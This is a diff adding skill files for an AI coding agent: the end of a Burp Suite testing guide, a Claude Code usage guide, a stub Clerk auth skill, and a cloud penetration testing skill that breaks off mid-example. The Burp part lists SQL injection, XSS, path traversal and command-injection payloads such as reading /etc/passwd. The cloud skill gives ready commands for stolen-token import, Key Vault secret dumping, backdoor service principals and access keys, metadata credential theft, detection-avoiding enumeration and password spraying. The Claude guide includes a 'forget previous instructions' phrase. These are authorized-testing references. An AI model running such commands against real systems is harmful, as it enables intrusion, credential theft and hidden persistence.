1. Open Burp Suite and create/open project
|
||||
2. Go to **Proxy > Intercept** tab
|
||||
3. Click **Open Browser** to launch preconfigured browser
|
||||
4. Position windows to view both Burp and browser simultaneously
|
||||
|
||||
#### Configure Interception
|
||||
Control which requests are captured:
|
||||
|
||||
```
|
||||
Proxy > Intercept > Intercept is on/off toggle
|
||||
|
||||
When ON: Requests pause for review/modification
|
||||
When OFF: Requests pass through, logged to history
|
||||
```
|
||||
|
||||
#### Intercept and Forward Requests
|
||||
Process intercepted traffic:
|
||||
|
||||
1. Set intercept toggle to **Intercept on**
|
||||
2. Navigate to target URL in browser
|
||||
3. Observe request held in Proxy > Intercept tab
|
||||
4. Review request contents (headers, parameters, body)
|
||||
5. Click **Forward** to send request to server
|
||||
6. Continue forwarding subsequent requests until page loads
|
||||
|
||||
#### View HTTP History
|
||||
Access complete traffic log:
|
||||
|
||||
1. Go to **Proxy > HTTP history** tab
|
||||
2. Click any entry to view full request/response
|
||||
3. Sort by clicking column headers (# for chronological order)
|
||||
4. Use filters to focus on relevant traffic
|
||||
|
||||
### Phase 2: Modifying Requests
|
||||
|
||||
#### Intercept and Modify
|
||||
Change request parameters before forwarding:
|
||||
|
||||
1. Enable interception: **Intercept on**
|
||||
2. Trigger target request in browser
|
||||
3. Locate parameter to modify in intercepted request
|
||||
4. Edit value directly in request editor
|
||||
5. Click **Forward** to send modified request
|
||||
|
||||
#### Common Modification Targets
|
||||
| Target | Example | Purpose |
|
||||
|--------|---------|---------|
|
||||
| Price parameters | `price=1` | Test business logic |
|
||||
| User IDs | `userId=admin` | Test access control |
|
||||
| Quantity values | `qty=-1` | Test input validation |
|
||||
| Hidden fields | `isAdmin=true` | Test privilege escalation |
|
||||
|
||||
#### Example: Price Manipulation
|
||||
|
||||
```http
|
||||
POST /cart HTTP/1.1
|
||||
Host: target.com
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
productId=1&quantity=1&price=100
|
||||
|
||||
# Modify to:
|
||||
productId=1&quantity=1&price=1
|
||||
```
|
||||
|
||||
Result: Item added to cart at modified price.
|
||||
|
||||
### Phase 3: Setting Target Scope
|
||||
|
||||
#### Define Scope
|
||||
Focus testing on specific target:
|
||||
|
||||
1. Go to **Target > Site map**
|
||||
2. Right-click target host in left panel
|
||||
3. Select **Add to scope**
|
||||
4. When prompted, click **Yes** to exclude out-of-scope traffic
|
||||
|
||||
#### Filter by Scope
|
||||
Remove noise from HTTP history:
|
||||
|
||||
1. Click display filter above HTTP history
|
||||
2. Select **Show only in-scope items**
|
||||
3. History now shows only target site traffic
|
||||
|
||||
#### Scope Benefits
|
||||
- Reduces clutter from third-party requests
|
||||
- Prevents accidental testing of out-of-scope sites
|
||||
- Improves scanning efficiency
|
||||
- Creates cleaner reports
|
||||
|
||||
### Phase 4: Using Burp Repeater
|
||||
|
||||
#### Send Request to Repeater
|
||||
Prepare request for manual testing:
|
||||
|
||||
1. Identify interesting request in HTTP history
|
||||
2. Right-click request and select **Send to Repeater**
|
||||
3. Go to **Repeater** tab to access request
|
||||
|
||||
#### Modify and Resend
|
||||
Test different inputs efficiently:
|
||||
|
||||
```
|
||||
1. View request in Repeater tab
|
||||
2. Modify parameter values
|
||||
3. Click Send to submit request
|
||||
4. Review response in right panel
|
||||
5. Use navigation arrows to review request history
|
||||
```
|
||||
|
||||
#### Repeater Testing Workflow
|
||||
|
||||
```
|
||||
Original Request:
|
||||
GET /product?productId=1 HTTP/1.1
|
||||
|
||||
Test 1: productId=2 → Valid product response
|
||||
Test 2: productId=999 → Not Found response
|
||||
Test 3: productId=' → Error/exception response
|
||||
Test 4: productId=1 OR 1=1 → SQL injection test
|
||||
```
|
||||
|
||||
#### Analyze Responses
|
||||
Look for indicators of vulnerabilities:
|
||||
|
||||
- Error messages revealing stack traces
|
||||
- Framework/version information disclosure
|
||||
- Different response lengths indicating logic flaws
|
||||
- Timing differences suggesting blind injection
|
||||
- Unexpected data in responses
|
||||
|
||||
### Phase 5: Running Automated Scans
|
||||
|
||||
#### Launch New Scan
|
||||
Initiate vulnerability scanning (Professional only):
|
||||
|
||||
1. Go to **Dashboard** tab
|
||||
2. Click **New scan**
|
||||
3. Enter target URL in **URLs to scan** field
|
||||
4. Configure scan settings
|
||||
|
||||
#### Scan Configuration Options
|
||||
|
||||
| Mode | Description | Duration |
|
||||
|------|-------------|----------|
|
||||
| Lightweight | High-level overview | ~15 minutes |
|
||||
| Fast | Quick vulnerability check | ~30 minutes |
|
||||
| Balanced | Standard comprehensive scan | ~1-2 hours |
|
||||
| Deep | Thorough testing | Several hours |
|
||||
|
||||
#### Monitor Scan Progress
|
||||
Track scanning activity:
|
||||
|
||||
1. View task status in **Dashboard**
|
||||
2. Watch **Target > Site map** update in real-time
|
||||
3. Check **Issues** tab for discovered vulnerabilities
|
||||
|
||||
#### Review Identified Issues
|
||||
Analyze scan findings:
|
||||
|
||||
1. Select scan task in Dashboard
|
||||
2. Go to **Issues** tab
|
||||
3. Click issue to view:
|
||||
- **Advisory**: Description and remediation
|
||||
- **Request**: Triggering HTTP request
|
||||
- **Response**: Server response showing vulnerability
|
||||
|
||||
### Phase 6: Intruder Attacks
|
||||
|
||||
#### Configure Intruder
|
||||
Set up automated attack:
|
||||
|
||||
1. Send request to Intruder (right-click > Send to Intruder)
|
||||
2. Go to **Intruder** tab
|
||||
3. Define payload positions using § markers
|
||||
4. Select attack type
|
||||
|
||||
#### Attack Types
|
||||
|
||||
| Type | Description | Use Case |
|
||||
|------|-------------|----------|
|
||||
| Sniper | Single position, iterate payloads | Fuzzing one parameter |
|
||||
| Battering ram | Same payload all positions | Credential testing |
|
||||
| Pitchfork | Parallel payload iteration | Username:password pairs |
|
||||
| Cluster bomb | All payload combinations | Full brute force |
|
||||
|
||||
#### Configure Payloads
|
||||
|
||||
```
|
||||
Positions Tab:
|
||||
POST /login HTTP/1.1
|
||||
...
|
||||
username=§admin§&password=§password§
|
||||
|
||||
Payloads Tab:
|
||||
Set 1: admin, user, test, guest
|
||||
Set 2: password, 123456, admin, letmein
|
||||
```
|
||||
|
||||
#### Analyze Results
|
||||
Review attack output:
|
||||
|
||||
- Sort by response length to find anomalies
|
||||
- Filter by status code for successful attempts
|
||||
- Use grep to search for specific strings
|
||||
- Export results for documentation
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Keyboard Shortcuts
|
||||
| Action | Windows/Linux | macOS |
|
||||
|--------|---------------|-------|
|
||||
| Forward request | Ctrl+F | Cmd+F |
|
||||
| Drop request | Ctrl+D | Cmd+D |
|
||||
| Send to Repeater | Ctrl+R | Cmd+R |
|
||||
| Send to Intruder | Ctrl+I | Cmd+I |
|
||||
| Toggle intercept | Ctrl+T | Cmd+T |
|
||||
|
||||
### Common Testing Payloads
|
||||
|
||||
```
|
||||
# SQL Injection
|
||||
' OR '1'='1
|
||||
' OR '1'='1'--
|
||||
1 UNION SELECT NULL--
|
||||
|
||||
# XSS
|
||||
<script>alert(1)</script>
|
||||
"><img src=x onerror=alert(1)>
|
||||
javascript:alert(1)
|
||||
|
||||
# Path Traversal
|
||||
../../../etc/passwd
|
||||
..\..\..\..\windows\win.ini
|
||||
|
||||
# Command Injection
|
||||
; ls -la
|
||||
| cat /etc/passwd
|
||||
`whoami`
|
||||
```
|
||||
|
||||
### Request Modification Tips
|
||||
- Right-click for context menu options
|
||||
- Use decoder for encoding/decoding
|
||||
- Compare requests using Comparer tool
|
||||
- Save interesting requests to project
|
||||
|
||||
## Constraints and Guardrails
|
||||
|
||||
### Operational Boundaries
|
||||
- Test only authorized applications
|
||||
- Configure scope to prevent accidental out-of-scope testing
|
||||
- Rate-limit scans to avoid denial of service
|
||||
- Document all findings and actions
|
||||
|
||||
### Technical Limitations
|
||||
- Community Edition lacks automated scanner
|
||||
- Some sites may block proxy traffic
|
||||
- HSTS/certificate pinning may require additional configuration
|
||||
- Heavy scanning may trigger WAF blocks
|
||||
|
||||
### Best Practices
|
||||
- Always set target scope before extensive testing
|
||||
- Use Burp's browser for reliable interception
|
||||
- Save project regularly to preserve work
|
||||
- Review scan results manually for false positives
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Business Logic Testing
|
||||
|
||||
**Scenario**: E-commerce price manipulation
|
||||
|
||||
1. Add item to cart normally, intercept request
|
||||
2. Identify `price=9999` parameter in POST body
|
||||
3. Modify to `price=1`
|
||||
4. Forward request
|
||||
5. Complete checkout at manipulated price
|
||||
|
||||
**Finding**: Server trusts client-provided price values.
|
||||
|
||||
### Example 2: Authentication Bypass
|
||||
|
||||
**Scenario**: Testing login form
|
||||
|
||||
1. Submit valid credentials, capture request in Repeater
|
||||
2. Send to Repeater for testing
|
||||
3. Try: `username=admin' OR '1'='1'--`
|
||||
4. Observe successful login response
|
||||
|
||||
**Finding**: SQL injection in authentication.
|
||||
|
||||
### Example 3: Information Disclosure
|
||||
|
||||
**Scenario**: Error-based information gathering
|
||||
|
||||
1. Navigate to product page, observe `productId` parameter
|
||||
2. Send request to Repeater
|
||||
3. Change `productId=1` to `productId=test`
|
||||
4. Observe verbose error revealing framework version
|
||||
|
||||
**Finding**: Apache Struts 2.5.12 disclosed in stack trace.
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Browser Not Connecting Through Proxy
|
||||
- Verify proxy listener is active (Proxy > Options)
|
||||
- Check browser proxy settings point to 127.0.0.1:8080
|
||||
- Ensure no firewall blocking local connections
|
||||
- Use Burp's embedded browser for reliable setup
|
||||
|
||||
### HTTPS Interception Failing
|
||||
- Install Burp CA certificate in browser/system
|
||||
- Navigate to http://burp to download certificate
|
||||
- Add certificate to trusted roots
|
||||
- Restart browser after installation
|
||||
|
||||
### Slow Performance
|
||||
- Limit scope to reduce processing
|
||||
- Disable unnecessary extensions
|
||||
- Increase Java heap size in startup options
|
||||
- Close unused Burp tabs and features
|
||||
|
||||
### Requests Not Being Intercepted
|
||||
- Verify "Intercept on" is enabled
|
||||
- Check intercept rules aren't filtering target
|
||||
- Ensure browser is using Burp proxy
|
||||
- Verify target isn't using unsupported protocol
|
||||
68
skills/claude-code-guide/SKILL.md
Normal file
68
skills/claude-code-guide/SKILL.md
Normal file
@@ -0,0 +1,68 @@
|
||||
---
|
||||
name: Claude Code Guide
|
||||
description: Master guide for using Claude Code effectively. Includes configuration templates, prompting strategies "Thinking" keywords, debugging techniques, and best practices for interacting with the agent.
|
||||
---
|
||||
|
||||
# Claude Code Guide
|
||||
|
||||
## Purpose
|
||||
|
||||
To provide a comprehensive reference for configuring and using Claude Code (the agentic coding tool) to its full potential. This skill synthesizes best practices, configuration templates, and advanced usage patterns.
|
||||
|
||||
## Configuration (`CLAUDE.md`)
|
||||
|
||||
When starting a new project, create a `CLAUDE.md` file in the root directory to guide the agent.
|
||||
|
||||
### Template (General)
|
||||
|
||||
```markdown
|
||||
# Project Guidelines
|
||||
|
||||
## Commands
|
||||
|
||||
- Run app: `npm run dev`
|
||||
- Test: `npm test`
|
||||
- Build: `npm run build`
|
||||
|
||||
## Code Style
|
||||
|
||||
- Use TypeScript for all new code.
|
||||
- Functional components with Hooks for React.
|
||||
- Tailwind CSS for styling.
|
||||
- Early returns for error handling.
|
||||
|
||||
## Workflow
|
||||
|
||||
- Read `README.md` first to understand project context.
|
||||
- Before editing, read the file content.
|
||||
- After editing, run tests to verify.
|
||||
```
|
||||
|
||||
## Advanced Features
|
||||
|
||||
### Thinking Keywords
|
||||
|
||||
Use these keywords in your prompts to trigger deeper reasoning from the agent:
|
||||
|
||||
- "Think step-by-step"
|
||||
- "Analyze the root cause"
|
||||
- "Plan before executing"
|
||||
- "Verify your assumptions"
|
||||
|
||||
### Debugging
|
||||
|
||||
If the agent is stuck or behaving unexpectedly:
|
||||
|
||||
1. **Clear Context**: Start a new session or ask the agent to "forget previous instructions" if confused.
|
||||
2. **Explicit Instructions**: Be extremely specific about paths, filenames, and desired outcomes.
|
||||
3. **Logs**: Ask the agent to "check the logs" or "run the command with verbose output".
|
||||
|
||||
## Best Practices
|
||||
|
||||
1. **Small Contexts**: Don't dump the entire codebase into the context. Use `grep` or `find` to locate relevant files first.
|
||||
2. **Iterative Development**: Ask for small changes, verify, then proceed.
|
||||
3. **Feedback Loop**: If the agent makes a mistake, correct it immediately and ask it to "add a lesson" to its memory (if supported) or `CLAUDE.md`.
|
||||
|
||||
## Reference
|
||||
|
||||
Based on [Claude Code Guide by zebbern](https://github.com/zebbern/claude-code-guide).
|
||||
56
skills/clerk-auth/SKILL.md
Normal file
56
skills/clerk-auth/SKILL.md
Normal file
@@ -0,0 +1,56 @@
|
||||
---
|
||||
name: clerk-auth
|
||||
description: "Expert patterns for Clerk auth implementation, middleware, organizations, webhooks, and user sync Use when: adding authentication, clerk auth, user authentication, sign in, sign up."
|
||||
source: vibeship-spawner-skills (Apache 2.0)
|
||||
---
|
||||
|
||||
# Clerk Authentication
|
||||
|
||||
## Patterns
|
||||
|
||||
### Next.js App Router Setup
|
||||
|
||||
Complete Clerk setup for Next.js 14/15 App Router.
|
||||
|
||||
Includes ClerkProvider, environment variables, and basic
|
||||
sign-in/sign-up components.
|
||||
|
||||
Key components:
|
||||
- ClerkProvider: Wraps app for auth context
|
||||
- <SignIn />, <SignUp />: Pre-built auth forms
|
||||
- <UserButton />: User menu with session management
|
||||
|
||||
|
||||
### Middleware Route Protection
|
||||
|
||||
Protect routes using clerkMiddleware and createRouteMatcher.
|
||||
|
||||
Best practices:
|
||||
- Single middleware.ts file at project root
|
||||
- Use createRouteMatcher for route groups
|
||||
- auth.protect() for explicit protection
|
||||
- Centralize all auth logic in middleware
|
||||
|
||||
|
||||
### Server Component Authentication
|
||||
|
||||
Access auth state in Server Components using auth() and currentUser().
|
||||
|
||||
Key functions:
|
||||
- auth(): Returns userId, sessionId, orgId, claims
|
||||
- currentUser(): Returns full User object
|
||||
- Both require clerkMiddleware to be configured
|
||||
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | high | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
| Issue | medium | See docs |
|
||||
498
skills/cloud-penetration-testing/SKILL.md
Normal file
498
skills/cloud-penetration-testing/SKILL.md
Normal file
@@ -0,0 +1,498 @@
|
||||
---
|
||||
name: Cloud Penetration Testing
|
||||
description: This skill should be used when the user asks to "perform cloud penetration testing", "assess Azure or AWS or GCP security", "enumerate cloud resources", "exploit cloud misconfigurations", "test O365 security", "extract secrets from cloud environments", or "audit cloud infrastructure". It provides comprehensive techniques for security assessment across major cloud platforms.
|
||||
---
|
||||
|
||||
# Cloud Penetration Testing
|
||||
|
||||
## Purpose
|
||||
|
||||
Conduct comprehensive security assessments of cloud infrastructure across Microsoft Azure, Amazon Web Services (AWS), and Google Cloud Platform (GCP). This skill covers reconnaissance, authentication testing, resource enumeration, privilege escalation, data extraction, and persistence techniques for authorized cloud security engagements.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
### Required Tools
|
||||
```bash
|
||||
# Azure tools
|
||||
Install-Module -Name Az -AllowClobber -Force
|
||||
Install-Module -Name MSOnline -Force
|
||||
Install-Module -Name AzureAD -Force
|
||||
|
||||
# AWS CLI
|
||||
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
|
||||
unzip awscliv2.zip && sudo ./aws/install
|
||||
|
||||
# GCP CLI
|
||||
curl https://sdk.cloud.google.com | bash
|
||||
gcloud init
|
||||
|
||||
# Additional tools
|
||||
pip install scoutsuite pacu
|
||||
```
|
||||
|
||||
### Required Knowledge
|
||||
- Cloud architecture fundamentals
|
||||
- Identity and Access Management (IAM)
|
||||
- API authentication mechanisms
|
||||
- DevOps and automation concepts
|
||||
|
||||
### Required Access
|
||||
- Written authorization for testing
|
||||
- Test credentials or access tokens
|
||||
- Defined scope and rules of engagement
|
||||
|
||||
## Outputs and Deliverables
|
||||
|
||||
1. **Cloud Security Assessment Report** - Comprehensive findings and risk ratings
|
||||
2. **Resource Inventory** - Enumerated services, storage, and compute instances
|
||||
3. **Credential Findings** - Exposed secrets, keys, and misconfigurations
|
||||
4. **Remediation Recommendations** - Hardening guidance per platform
|
||||
|
||||
## Core Workflow
|
||||
|
||||
### Phase 1: Reconnaissance
|
||||
|
||||
Gather initial information about target cloud presence:
|
||||
|
||||
```bash
|
||||
# Azure: Get federation info
|
||||
curl "https://login.microsoftonline.com/getuserrealm.srf?login=user@target.com&xml=1"
|
||||
|
||||
# Azure: Get Tenant ID
|
||||
curl "https://login.microsoftonline.com/target.com/v2.0/.well-known/openid-configuration"
|
||||
|
||||
# Enumerate cloud resources by company name
|
||||
python3 cloud_enum.py -k targetcompany
|
||||
|
||||
# Check IP against cloud providers
|
||||
cat ips.txt | python3 ip2provider.py
|
||||
```
|
||||
|
||||
### Phase 2: Azure Authentication
|
||||
|
||||
Authenticate to Azure environments:
|
||||
|
||||
```powershell
|
||||
# Az PowerShell Module
|
||||
Import-Module Az
|
||||
Connect-AzAccount
|
||||
|
||||
# With credentials (may bypass MFA)
|
||||
$credential = Get-Credential
|
||||
Connect-AzAccount -Credential $credential
|
||||
|
||||
# Import stolen context
|
||||
Import-AzContext -Profile 'C:\Temp\StolenToken.json'
|
||||
|
||||
# Export context for persistence
|
||||
Save-AzContext -Path C:\Temp\AzureAccessToken.json
|
||||
|
||||
# MSOnline Module
|
||||
Import-Module MSOnline
|
||||
Connect-MsolService
|
||||
```
|
||||
|
||||
### Phase 3: Azure Enumeration
|
||||
|
||||
Discover Azure resources and permissions:
|
||||
|
||||
```powershell
|
||||
# List contexts and subscriptions
|
||||
Get-AzContext -ListAvailable
|
||||
Get-AzSubscription
|
||||
|
||||
# Current user role assignments
|
||||
Get-AzRoleAssignment
|
||||
|
||||
# List resources
|
||||
Get-AzResource
|
||||
Get-AzResourceGroup
|
||||
|
||||
# Storage accounts
|
||||
Get-AzStorageAccount
|
||||
|
||||
# Web applications
|
||||
Get-AzWebApp
|
||||
|
||||
# SQL Servers and databases
|
||||
Get-AzSQLServer
|
||||
Get-AzSqlDatabase -ServerName $Server -ResourceGroupName $RG
|
||||
|
||||
# Virtual machines
|
||||
Get-AzVM
|
||||
$vm = Get-AzVM -Name "VMName"
|
||||
$vm.OSProfile
|
||||
|
||||
# List all users
|
||||
Get-MSolUser -All
|
||||
|
||||
# List all groups
|
||||
Get-MSolGroup -All
|
||||
|
||||
# Global Admins
|
||||
Get-MsolRole -RoleName "Company Administrator"
|
||||
Get-MSolGroupMember -GroupObjectId $GUID
|
||||
|
||||
# Service Principals
|
||||
Get-MsolServicePrincipal
|
||||
```
|
||||
|
||||
### Phase 4: Azure Exploitation
|
||||
|
||||
Exploit Azure misconfigurations:
|
||||
|
||||
```powershell
|
||||
# Search user attributes for passwords
|
||||
$users = Get-MsolUser -All
|
||||
foreach($user in $users){
|
||||
$props = @()
|
||||
$user | Get-Member | foreach-object{$props+=$_.Name}
|
||||
foreach($prop in $props){
|
||||
if($user.$prop -like "*password*"){
|
||||
Write-Output ("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
# Execute commands on VMs
|
||||
Invoke-AzVMRunCommand -ResourceGroupName $RG -VMName $VM -CommandId RunPowerShellScript -ScriptPath ./script.ps1
|
||||
|
||||
# Extract VM UserData
|
||||
$vms = Get-AzVM
|
||||
$vms.UserData
|
||||
|
||||
# Dump Key Vault secrets
|
||||
az keyvault list --query '[].name' --output tsv
|
||||
az keyvault set-policy --name <vault> --upn <user> --secret-permissions get list
|
||||
az keyvault secret list --vault-name <vault> --query '[].id' --output tsv
|
||||
az keyvault secret show --id <URI>
|
||||
```
|
||||
|
||||
### Phase 5: Azure Persistence
|
||||
|
||||
Establish persistence in Azure:
|
||||
|
||||
```powershell
|
||||
# Create backdoor service principal
|
||||
$spn = New-AzAdServicePrincipal -DisplayName "WebService" -Role Owner
|
||||
$BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($spn.Secret)
|
||||
$UnsecureSecret = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($BSTR)
|
||||
|
||||
# Add service principal to Global Admin
|
||||
$sp = Get-MsolServicePrincipal -AppPrincipalId <AppID>
|
||||
$role = Get-MsolRole -RoleName "Company Administrator"
|
||||
Add-MsolRoleMember -RoleObjectId $role.ObjectId -RoleMemberType ServicePrincipal -RoleMemberObjectId $sp.ObjectId
|
||||
|
||||
# Login as service principal
|
||||
$cred = Get-Credential # AppID as username, secret as password
|
||||
Connect-AzAccount -Credential $cred -Tenant "tenant-id" -ServicePrincipal
|
||||
|
||||
# Create new admin user via CLI
|
||||
az ad user create --display-name <name> --password <pass> --user-principal-name <upn>
|
||||
```
|
||||
|
||||
### Phase 6: AWS Authentication
|
||||
|
||||
Authenticate to AWS environments:
|
||||
|
||||
```bash
|
||||
# Configure AWS CLI
|
||||
aws configure
|
||||
# Enter: Access Key ID, Secret Access Key, Region, Output format
|
||||
|
||||
# Use specific profile
|
||||
aws configure --profile target
|
||||
|
||||
# Test credentials
|
||||
aws sts get-caller-identity
|
||||
```
|
||||
|
||||
### Phase 7: AWS Enumeration
|
||||
|
||||
Discover AWS resources:
|
||||
|
||||
```bash
|
||||
# Account information
|
||||
aws sts get-caller-identity
|
||||
aws iam list-users
|
||||
aws iam list-roles
|
||||
|
||||
# S3 Buckets
|
||||
aws s3 ls
|
||||
aws s3 ls s3://bucket-name/
|
||||
aws s3 sync s3://bucket-name ./local-dir
|
||||
|
||||
# EC2 Instances
|
||||
aws ec2 describe-instances
|
||||
|
||||
# RDS Databases
|
||||
aws rds describe-db-instances --region us-east-1
|
||||
|
||||
# Lambda Functions
|
||||
aws lambda list-functions --region us-east-1
|
||||
aws lambda get-function --function-name <name>
|
||||
|
||||
# EKS Clusters
|
||||
aws eks list-clusters --region us-east-1
|
||||
|
||||
# Networking
|
||||
aws ec2 describe-subnets
|
||||
aws ec2 describe-security-groups --group-ids <sg-id>
|
||||
aws directconnect describe-connections
|
||||
```
|
||||
|
||||
### Phase 8: AWS Exploitation
|
||||
|
||||
Exploit AWS misconfigurations:
|
||||
|
||||
```bash
|
||||
# Check for public RDS snapshots
|
||||
aws rds describe-db-snapshots --snapshot-type manual --query=DBSnapshots[*].DBSnapshotIdentifier
|
||||
aws rds describe-db-snapshot-attributes --db-snapshot-identifier <id>
|
||||
# AttributeValues = "all" means publicly accessible
|
||||
|
||||
# Extract Lambda environment variables (may contain secrets)
|
||||
aws lambda get-function --function-name <name> | jq '.Configuration.Environment'
|
||||
|
||||
# Access metadata service (from compromised EC2)
|
||||
curl http://169.254.169.254/latest/meta-data/
|
||||
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
||||
|
||||
# IMDSv2 access
|
||||
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
|
||||
curl http://169.254.169.254/latest/meta-data/profile -H "X-aws-ec2-metadata-token: $TOKEN"
|
||||
```
|
||||
|
||||
### Phase 9: AWS Persistence
|
||||
|
||||
Establish persistence in AWS:
|
||||
|
||||
```bash
|
||||
# List existing access keys
|
||||
aws iam list-access-keys --user-name <username>
|
||||
|
||||
# Create backdoor access key
|
||||
aws iam create-access-key --user-name <username>
|
||||
|
||||
# Get all EC2 public IPs
|
||||
for region in $(cat regions.txt); do
|
||||
aws ec2 describe-instances --query=Reservations[].Instances[].PublicIpAddress --region $region | jq -r '.[]'
|
||||
done
|
||||
```
|
||||
|
||||
### Phase 10: GCP Enumeration
|
||||
|
||||
Discover GCP resources:
|
||||
|
||||
```bash
|
||||
# Authentication
|
||||
gcloud auth login
|
||||
gcloud auth activate-service-account --key-file creds.json
|
||||
gcloud auth list
|
||||
|
||||
# Account information
|
||||
gcloud config list
|
||||
gcloud organizations list
|
||||
gcloud projects list
|
||||
|
||||
# IAM Policies
|
||||
gcloud organizations get-iam-policy <org-id>
|
||||
gcloud projects get-iam-policy <project-id>
|
||||
|
||||
# Enabled services
|
||||
gcloud services list
|
||||
|
||||
# Source code repos
|
||||
gcloud source repos list
|
||||
gcloud source repos clone <repo>
|
||||
|
||||
# Compute instances
|
||||
gcloud compute instances list
|
||||
gcloud beta compute ssh --zone "region" "instance" --project "project"
|
||||
|
||||
# Storage buckets
|
||||
gsutil ls
|
||||
gsutil ls -r gs://bucket-name
|
||||
gsutil cp gs://bucket/file ./local
|
||||
|
||||
# SQL instances
|
||||
gcloud sql instances list
|
||||
gcloud sql databases list --instance <id>
|
||||
|
||||
# Kubernetes
|
||||
gcloud container clusters list
|
||||
gcloud container clusters get-credentials <cluster> --region <region>
|
||||
kubectl cluster-info
|
||||
```
|
||||
|
||||
### Phase 11: GCP Exploitation
|
||||
|
||||
Exploit GCP misconfigurations:
|
||||
|
||||
```bash
|
||||
# Get metadata service data
|
||||
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true&alt=text" -H "Metadata-Flavor: Google"
|
||||
|
||||
# Check access scopes
|
||||
curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes -H 'Metadata-Flavor:Google'
|
||||
|
||||
# Decrypt data with keyring
|
||||
gcloud kms decrypt --ciphertext-file=encrypted.enc --plaintext-file=out.txt --key <key> --keyring <keyring> --location global
|
||||
|
||||
# Serverless function analysis
|
||||
gcloud functions list
|
||||
gcloud functions describe <name>
|
||||
gcloud functions logs read <name> --limit 100
|
||||
|
||||
# Find stored credentials
|
||||
sudo find /home -name "credentials.db"
|
||||
sudo cp -r /home/user/.config/gcloud ~/.config
|
||||
gcloud auth list
|
||||
```
|
||||
|
||||
## Quick Reference
|
||||
|
||||
### Azure Key Commands
|
||||
|
||||
| Action | Command |
|
||||
|--------|---------|
|
||||
| Login | `Connect-AzAccount` |
|
||||
| List subscriptions | `Get-AzSubscription` |
|
||||
| List users | `Get-MsolUser -All` |
|
||||
| List groups | `Get-MsolGroup -All` |
|
||||
| Current roles | `Get-AzRoleAssignment` |
|
||||
| List VMs | `Get-AzVM` |
|
||||
| List storage | `Get-AzStorageAccount` |
|
||||
| Key Vault secrets | `az keyvault secret list --vault-name <name>` |
|
||||
|
||||
### AWS Key Commands
|
||||
|
||||
| Action | Command |
|
||||
|--------|---------|
|
||||
| Configure | `aws configure` |
|
||||
| Caller identity | `aws sts get-caller-identity` |
|
||||
| List users | `aws iam list-users` |
|
||||
| List S3 buckets | `aws s3 ls` |
|
||||
| List EC2 | `aws ec2 describe-instances` |
|
||||
| List Lambda | `aws lambda list-functions` |
|
||||
| Metadata | `curl http://169.254.169.254/latest/meta-data/` |
|
||||
|
||||
### GCP Key Commands
|
||||
|
||||
| Action | Command |
|
||||
|--------|---------|
|
||||
| Login | `gcloud auth login` |
|
||||
| List projects | `gcloud projects list` |
|
||||
| List instances | `gcloud compute instances list` |
|
||||
| List buckets | `gsutil ls` |
|
||||
| List clusters | `gcloud container clusters list` |
|
||||
| IAM policy | `gcloud projects get-iam-policy <project>` |
|
||||
| Metadata | `curl -H "Metadata-Flavor: Google" http://metadata.google.internal/...` |
|
||||
|
||||
### Metadata Service URLs
|
||||
|
||||
| Provider | URL |
|
||||
|----------|-----|
|
||||
| AWS | `http://169.254.169.254/latest/meta-data/` |
|
||||
| Azure | `http://169.254.169.254/metadata/instance?api-version=2018-02-01` |
|
||||
| GCP | `http://metadata.google.internal/computeMetadata/v1/` |
|
||||
|
||||
### Useful Tools
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| ScoutSuite | Multi-cloud security auditing |
|
||||
| Pacu | AWS exploitation framework |
|
||||
| AzureHound | Azure AD attack path mapping |
|
||||
| ROADTools | Azure AD enumeration |
|
||||
| WeirdAAL | AWS service enumeration |
|
||||
| MicroBurst | Azure security assessment |
|
||||
| PowerZure | Azure post-exploitation |
|
||||
|
||||
## Constraints and Limitations
|
||||
|
||||
### Legal Requirements
|
||||
- Only test with explicit written authorization
|
||||
- Respect scope boundaries between cloud accounts
|
||||
- Do not access production customer data
|
||||
- Document all testing activities
|
||||
|
||||
### Technical Limitations
|
||||
- MFA may prevent credential-based attacks
|
||||
- Conditional Access policies may restrict access
|
||||
- CloudTrail/Activity Logs record all API calls
|
||||
- Some resources require specific regional access
|
||||
|
||||
### Detection Considerations
|
||||
- Cloud providers log all API activity
|
||||
- Unusual access patterns trigger alerts
|
||||
- Use slow, deliberate enumeration
|
||||
- Consider GuardDuty, Security Center, Cloud Armor
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Azure Password Spray
|
||||
|
||||
**Scenario:** Test Azure AD password policy
|
||||
|
||||
```powershell
|
||||
# Using MSOLSpray with FireProx for IP rotation
|
||||
# First create FireProx endpoint
|
||||
python fire.py --access_key <key> --secret_access_key <secret> --region us-east-1 --url https://login.microsoft.com --command create
|
||||
|
||||
# Spray passwords
|
||||
Import-Module .\MSOLSpray.ps1
|
||||
Invoke-MSOLSpray -UserList .\users.txt -Password "Spring2024!" -URL https://<api-gateway>.execute-api.us-east-1.amazonaws.com/fireprox
|
||||
```
|
||||
|
||||
### Example 2: AWS S3 Bucket Enumeration
|
||||
|
||||
**Scenario:** Find and access misconfigured S3 buckets
|
||||
|
||||
```bash
|
||||
# List all buckets
|
||||
aws s3 ls | awk '{print $3}' > buckets.txt
|
||||
|
||||
# Check each bucket for contents
|
||||
while read bucket; do
|
||||
echo "Checking: $bucket"
|
||||
aws s3 ls s3://$bucket 2>/dev/null
|
||||
done < buckets.txt
|
||||
|
||||
